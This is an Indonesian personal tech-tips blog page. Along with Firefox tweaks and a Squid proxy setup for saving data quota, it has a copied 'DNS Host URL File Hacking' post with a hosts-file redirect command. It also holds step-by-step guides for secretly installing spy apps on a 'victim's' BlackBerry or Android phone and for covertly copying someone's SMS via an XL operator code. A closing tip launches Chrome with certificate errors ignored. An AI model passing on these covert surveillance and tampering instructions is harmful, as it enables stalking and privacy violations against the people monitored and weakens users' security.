  • Kembali ke filter search bar, ketikkan “network.dns.disableIPv6?. Double klik untuk merubah nilainya menjadi ‘true’.
  • Klik kanan di halaman konfigurasi tersebut dimanapun terserah, pilih new –>boolean. Ketikkan “content.interrupt.parsing”pada popup windows yang muncul kemudian klik OK. Ketika prompt untuk pilihan muncul, pilih ‘true’.
  • Kembali klik kanan halaman konfigurasi, pilih new –> integer. Ketikkan “content.max.tokenizing.time”. Pada prompt value yang muncul masukkan nilai 2250000.
  • Kembali klik kanan halaman konfigurasi, pilih new –> integer. Ketikkan “content.notify.interval”. Masukkan nilai 750000 pada prompt value yang muncul.
  • Kembali klik kanan halaman konfigurasi, pilih new –> boolean. Ketikkan “content.notify.ontimer”. Pilih ‘true’ untuk isian prompt value yang muncul.
  • Kembali klik kanan halaman konfigurasi, pilih new –> integer. Ketikkan “content.notify.backoffcount”. Pada prompt value yang muncul isikan value ‘5'.
  • Kembali klik kanan halaman konfigurasi, pilih new –> integer. Ketikkan “content.switch.threshold”. Isikan nilai 750000 pada prompt integer value yang muncul.
  • Terakhir, kembali klik kanan pada halaman konfigurasi, pilih new –>integer. Ketikkan “nglayout.initialpaint.delay”. Isikan nilai ‘0' pada prompt isian nilai yang muncul. 
  •  
Sekian artikel dari saya semoga bermanfaat !!


Magic4rt Blog | Angga Tri Kusuma

Cara Menghemat Quota Internet

Pada koneksi ber-quota terbatas seperti Indosat 3G Broadband, Indosat M2, dan Telkomsel Flash, mobi, tentunya sangat menjengkelkan jika tiba-tiba quota kita habis. Resikonya untuk beberapa paket akan turun drastis, dan beberapa paket lainnya akan sama sekali tidak bisa digunakan. Contohnya seperti yang saya  pakai, Indosat Broadband Eco, jika quota habis akan turun drastis menjadi 64kbps, atau setara dengan koneksi GPRS.

Ada beberapa cara untuk menghemat jatah quota internet kita, diantaranya adalah dengan meminimalkan content untuk browsing (ex: disable images), menggunakan compression proxy (toonel, onspeed, dll), dan menggunakan cache proxy.

Pada koneksi ber-quota terbatas seperti Indosat 3G Broadband, Indosat M2, dan Telkomsel Flash, tentunya sangat menjengkelkan jika tiba-tiba quota kita habis. Resikonya untuk beberapa paket akan turun drastis, dan beberapa paket lainnya akan sama sekali tidak bisa digunakan.

nah... disini saya akan membahas penghematan bandwidth dengan cache proxy menggunakan Squid 2.7.STABLE5. (sudah saya test di os vista) .
Dengan cache proxy, pada situs-situs yang sering kita kunjungi, content yang harus didownload dan mengurangi jatah quota kita akan lebih sedikit. Karena content-content tersebut akan tersimpan dahulu di cache proxy kita. Jadi secara tidak langsung, jika kita mengunjungi situs tersebut berulang kali, sama saja kita mendownload content dari komputer yang terinstall proxy kita. Kesimpulannya.. lebih cepat dan lebih ngirit bandwidth.
Lanjut???

Download dulu Squid Proxy 2.7 Stable5 untuk Windows di SINI

Extract file tersebut di partisi mana saja.. terserah, dimana saja boleh. Untuk mempermudah langkah-langkah instalasinya, bisa disamakan dengan saya, atau extract di “C:\squid\
Setelah semua ter-extract, masuk ke folder “C:\squid\etc\“. Disana terdapat file-file konfigurasi squid :

- cachemgr.conf.default
- mime.conf.default
- squid.conf.default
- squid_radius_auth.conf.default

Kemudian rename keempat file tersebut dengan menghilangkan tulisan “.default“. Sehingga menjadi:

- cachemgr.conf
- mime.conf
- squid.conf
- squid_radius_auth.conf

Setelah selesai me-rename keempat file tersebut, kemudian buka file “squid.conf” dengan notepad atau bisa juga dengan (EditPlus, Ultra Edit, Notepad ++, dan lain-lain).
Cari tulisan (CTRL+F) “TAG: http_port“, kemudian cek apakah di bawah tulisan “# Squid normally listens to port 3128” sudah ada tulisan “http_port 3128” atau belum, jika belum tambahkan tulisan “http_port 3128” di bawah tulisan “# Squid normally listens to port 3128“.
Sehingga menjadi seperti di bawah ini

# TAG: http_port
# Usage: port [options]
# hostname: port [options]
# 1.2.3.4: port [options]
# If you run Squid on a dual-homed machine with an internal
# and an external interface we recommend you to specify the
# internal address: port in http_port. This way Squid will only be
# visible on the internal address.
#
# Squid normally listens to port 3128
http_port 3128

Cari tulisan (CTRL+F) “TAG: visible_hostname“, kemudian cek apakah di bawah tulisan “# none” sudah ada tulisan “visible_hostname localhost” atau belum. Jika belum, tambahkan tulisan “visible_hostname localhost” di bawah tulisan “# none“.
Sehingga menjadi  seperti di bawah ini

# TAG: visible_hostname
# If you want to present a special hostname in error messages, etc,
# define this. Otherwise, the return value of gethostname()
# will be used. If you have multiple caches in a cluster and
# get errors about IP-forwarding you must set them to have individual
# names with this setting.
#
#Default:
# none
visible_hostname localhost

Cari tulisan (CTRL+F) “http_access allow localnet“, kemudian cek apakah dibawah tulisan “http_access allow localnet” sudah terdapat tulisan “http_access allow localhost” atau belum. Jika belum tambahkan tulisan “http_access allow localhost” di bawah tulisan “http_access allow localnet“.
Sehingga menjadi seperti di bawah ini

# Example rule allowing access from your local networks.
# Adapt localnet in the ACL section to list your (internal) IP networks
# from where browsing should be allowed
http_access allow localnet
http_access allow localhost

Cari tulisan (CTRL+F) “TAG: dns_nameservers“, kemudian dibawahnya pada tulisan “dns_nameservers“, isi value dns dengan dns ISP nya masing-masing, atau dengan DNS yang biasanya anda gunakan. Sehingga formatnya menjadi “dns_nameservers [primary DNS] [secondary DNS]“. Contohnya ditempat saya menggunakan OpenDNS dan speedy, sehingga menjadi “dns_nameservers 208.67.220.220 202.134.0.155“.
Sehingga menjadi seperti di bawah ini

# TAG: dns_nameservers
# Use this if you want to specify a list of DNS name servers
# (IP addresses) to use instead of those given in your
# /etc/resolv.conf file.
# On Windows platforms, if no value is specified here or in
# the /etc/resolv.conf file, the list of DNS name servers are
# taken from the Windows registry, both static and dynamic DHCP
# configurations are supported.
#
# Example: dns_nameservers 10.0.0.1 192.172.0.4
#
#Default:
# none
dns_nameservers 208.67.220.220 202.134.0.155

Selesai !!!!!

# Simpan (CTRL+S) “squid.conf” yang baru saja kita edit tadi.
# Buka “Command Prompt“, kemudian masuk ke directory “squid” tadi melalui “Command Prompt”. Contohnya adalah dengan mengetik “cd C:\squid\sbin\“.

C:\>cd c:\squid\sbin\
C:\squid\sbin>

Setelah masuk ke directory “cd C:\squid\sbin\” melalui command prompt, kemudian ketik “squid -z“.

C:\squid\sbin>squid -z
2008/11/18 08:45:20| Creating Swap Directories
C:\squid\sbin>

Masih di “command prompt”, ketik “squid -d l -D“, kemudian tekan CTRL+C“. 

C:\squid\sbin>squid -d l -D
2008/11/18 08:46:17| Starting Squid Cache version 2.7.STABLE5 for i686-pc-winnt.
..
2008/11/18 08:46:17| Running on Windows XP
C:\squid\sbin>

Masih di “command prompt”, ketik “squid -i

C:\squid\sbin>squid -i
Registry stored HKLM\SOFTWARE\GNU\Squid\2.6\Squid\ConfigFile value c:/squid/etc/
squid.conf
Squid Cache version 2.7.STABLE5 for i686-pc-winnt
installed successfully as Squid Windows System Service.
To run, start it from the Services Applet of Control Panel.
Don’t forget to edit squid.conf before starting it.
C:\squid\sbin>

Dan yang terakhir (masih di command prompt), ketik “squid -O -D

C:\squid\sbin>squid -O -D
Registry stored HKLM\SOFTWARE\GNU\Squid\2.6\Squid\CommandLine value -D
C:\squid\sbin>

Untuk menghidupkan proxy, masuk ke “Control Panel” -> “Administrative Tools” -> “Services“. Kemudian cari nama services “squid” -> “Klik kanan” -> “Start“
Arahkan proxy pada browser anda ke alamat “localhost” dengan port “3128“.
Seperti gambar di bawah ini

Cara Menghemat Quota Internet
Anda juga bisa menghapus services squid tersebut dengan cara mengetikkan perintah “squid -r -n squid” di Command Prompt.

C:\squid\sbin>squid -r -n squid
Service squid deleted successfully.

DNS Host URL File Hacking

Pernah kebayang gak saat kita mau buka website A tiba2 yang muncul malah website B, tapi anehnya Url nya adalah alamat website A ? wah…pikiran kita pasti langsung ke virus atau spyware, belum tentu, bisa aja ada seseorang yang iseng <baca:hacker> telah menyusup ke system kita dan merubah file host untuk di arahkan ke Url yang dia kehendaki
Terus Gimana caranya ? cekicrot….
1. Buka cmd kamu dengan cara masuk menu run→cmd trus enter
2. Kalau udah masuk ketikkan
cd\windows\system32\drivers\etc
Seperti gambar di bawah ini :
Photobucket
3.  Cek dulu isi file hosts nya dengan perintah type hosts maka akan muncul seperti gambar dibawah ini
Photobucket
4. Muncul kan isi dari file hosts, terus gimana cara ngrubahnya ? gini caranya…ping dulu alamat yang mau dijadikan pengubah url target. Disini saya ambil contoh : www.kompas.co.id
Photobucket
5.  Nah, dapetkan IP nya.  tinggal nentuin sasarannya, website sasaran saya adalah www.jasaraharja.co.id, kalian boleh website apa aja.
6. jadi perintahnya adalah :
echo 202.146.4.100 www.jasaraharja.co.id >> hosts
trus enter deh.
Photobucket
7. Coba cek lagi di hosts nya tadi dengan perintah type hosts dah muncul kan perubahan
yang kita lakukan tadi…
Photobucket
8.  Buat nge-cek hasilnya,buka browser kamu dan coba browse ke www.jasaraharja.co.id
Pasti berubah tampilannya ke kompas.com, kaya ini nih..
Photobucket
Gak sulit kan membuat halaman website redirect ke halaman lain, hanya bermodalkan CMD
Selamat Mencoba !

Sumber : http://www.binushacker.net/dns-host-url-file-hacking.html

Sadap HP Blackberry dan Android


Sebelumnya Cyber4rt sudah berbagi cara untuk menyadap SMS dari HP orang lain ke HP kamu sendiri. Dan sekarang, saya akan berbagi cara untuk sadap BBM untuk kamu para pengguna BB. Ini khusus untuk BB asli bukan BB cina punya. Ok, langsung saja kamu perhatikan langkah-langkah berikut ini.

1. Siapkan BB korban untuk dilakukan instalasi aplikasi sadap BBM

2. Silahkan kamu login ke situs DEREX.COM, silahkan kamu daftar dengan cara mengisi nama, email, password, pilih Message Plan Dexrex Free.

3. Setelah itu kamu akan mendapat 2 pilihan untuk memilih. Lihat pada gambar.

4. Jika kamu pengguna BB, maka pilih BLACKBERRY dan jika Android, kamu pilih ANDROID. Setelah itu akan ada verifikasi email dan kamu akan diberi link untuk download aplikasinya. Lihat pada gambar.


5. Selanjutnya, pada halaman tersebut kamu akan mendapatkan instruksi cara penginstalan aplikasi tersebut pada gadget kamu.

6. Setelah instalasi selesai, maka aplikasi sudah dapat berjalan di BB korban dan jika di close aplikasi tetap berjalan dan melakukan connect server automatis.
Perhatian..! Cara ini digunakan untuk hal yang penting saja.

OK, Selamat mencoba.

Sadap SMS di Handphone Biasa


Sekarang sudah ada cara sadap/mengalihkan panggilan, sms, telepon, pembicaraan private bahkan BBM juga bisa disadap. Kalau kamu ingin tahu cara menyadap dengan cara mudah, kamu cukup punya handphone biasa saja. Dengan handphone biasa ini, kamu dapat menyadap sms orang lain tanpa aplikasi apa pun yang diinstal. Langsung saja, saya berbagi trik sadap sms dengan menggunakan trik operator selular.

Sadap SMS di Handphone Biasa


Bagi kamu para pengguna operator selular XL, kamu sangat beruntung. Karena dengan menggunakan operator ini, kamu dapat melakukan penyadapan secara sederhana. Dan kamu dapat membaca petunjuk berikut ini.
1. Siapkan gadget orang yang ingin kamu sadap. ( Agak dirayu dikit untuk mendapatkan gadgetnya )

2. Ketik *123*571# di gadget korban, lalu kamu tekan CALL.

3. Setelah itu kamu akan mendapat beberapa pilihan, jadi kamu pilih no 2 ( Layanan Lain )

4. Dari pilihan tadi, akan muncul 2 pilihan baru, yaitu :
  • AUTO FORWARD => Menerima SMS orang lain langsung tanpa masuk ke no HP korban.
  • AUTO COPY => Menerima SMS orang lain yang masuk ke no HP korban dan juga ke no HP kamu sendiri.

5. Setelah itu, kamu pilih yang AUTO COPY, agar kamu dapat mengetahui lebih detail lagi tanpa ketahuan. Dan kemudian, kamu tungggu konfirmasi dari operator XL untuk pemotongan biaya ( 1000/ bulan )

6. Lalu kamu mengirim sms dari HP korban dengan format : COPY ON lalu kirim ke no HP kamu. Maka proses sadap SMS sudah berhasil.

OK, Selamat mencoba.

http://life.xl.co.id/layanan/index.do

Download Aplikasi Android Market / Play Store Dengan PC


Saat ini kita dapat menggunakan komputer untuk mengunduh aplikasi dari google play store dengan media PC atau Laptop anda. Bagaimanakah caranya? Mari kita bahas bagaimana cara mengunduh aplikasi di google play store dengan media PC atau Laptop.

Langkah yang harus anda tempuh:
1.Jika anda menggunakan google chrome v17 (dapat anda lihat di menu opsi yang terletak di kanan atas tepatnya dibawah tombol close, setelah itu pilih "tentang google chrome"), anda dapat melewati langkah pertama ini, namun jika anda mempunyai versi dibawah atau blom mempunyai google chrome anda dapat download dan install google chrome terlebih dahulu, anda bisa mendapatkannya di sini. (Kenapa menggunakan google chrome? Karena aplikasi downloader itu menggunakan plug in dari google chrome)
2.Download APK Downloader di sini. Lalu tarik dan arahkan ke halaman web google chrome. Nanti akan ada konfirmasi penginstalan exstention.
3.Tutup google chrome yang telah anda pasang plug in / add on tersebut.
4.Kemudian klik kanan icon google chrome pada desktop anda, masuklah pada opsi properties, setelah itu tambahkan kode:
--ignore-certificate-errors
sebagai contoh penambahan kode:
C:\…\chrome.exe --ignore-certificate-errors
atau
“C:\…\chrome.exe” –ignore-certificate-errors
5.Tutup kembali google chrome, kemudian buka kembali dan masuk pada google play store
6.Klik icon gambar android pada kolom sebelah URL address (bergambar logo android)
7.Maka akan muncul sebuah kotak yang berisikan peringatan dimana anda harus mengisikan alamat email yang digunakan pada android device anda (play store anda) dan Device ID
8.Isikan email dan Device ID (semacam serial number) dari ponsel android yang anda punya, karena itu install aplikasi device id di ponsel android anda. Untuk mengetahui device ID anda, anda ketikkan  *#*#8255#*#*. Contoh android-1234567890abcdef maka ID device anda adalah 1234567890abcdef
Atau anda dapat juga mengetahuinya dengan download aplikasinya di sini. Buka aplikasi device id di ponsel dan kamu akan mendapatkan alamat email dan device id. Copy dan Paste data tersebut.
9.Setelah langkah memasukan Device ID dan email, anda buka aplikasi yang hendak anda unduh di google play store, setelah halaman pada web terbuka sempurana, anda klik gambar android pada kanan atas sebelah URL address tersebut.
10.Aplikasi telah terunduh dan anda dapat memindahkannya ke android device anda.
Catatan: Jika anda binggung, anda dapat melihat langsung pada official web di sini.

[ Categories ]